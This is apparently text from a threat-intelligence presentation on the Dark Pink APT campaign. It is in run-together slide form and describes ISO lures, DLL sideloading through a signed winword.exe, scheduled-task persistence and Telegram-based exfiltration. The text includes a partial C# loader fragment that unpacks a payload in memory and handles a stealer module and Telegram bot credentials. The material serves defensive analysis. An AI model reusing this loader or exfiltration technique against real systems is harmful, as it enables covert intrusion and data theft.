揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析

Unveiling Dark Pink:An In-Depth Analysis of APAC’s Covert APT ThreatOUTLINEDark Pink’s latest campaignTelegram Exfiltration and C2 demoTeleScoutDark Pink’s TTPsI GOT AN EMAIL!(Group-IB, 2023)ISO FILEISO FILESigned winword.exe sideloads wwlib.dllMalicious wwlib.dll sets up persistenceExtracts XOR encrypted payload from .doc lureDisplays .doc lureSets up scheduled taskSCHEDULED TASKMicrosoft Build Task saved in Temp folderName wct*.tmp relates to normal OneDrive activity public static void main() { string stealer_module = init_br(); string Telegram_Chat_ID = Encoding.Default.GetString(chat_id_numbers); var inputStream = new MemoryStream(main_payload); ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read); ZipArchiveEntry archEntry = archive.Entries[0]; Stream entryStream = archEntry.Open() var tmpMem = new MemoryStream(); entryStream.CopyTo(tmpMem); var xtmp = tmpMem.ToArray(); var memory_payload = Assembly.Load(xtmp); byte[] Telegram_BOT_API_token = Convert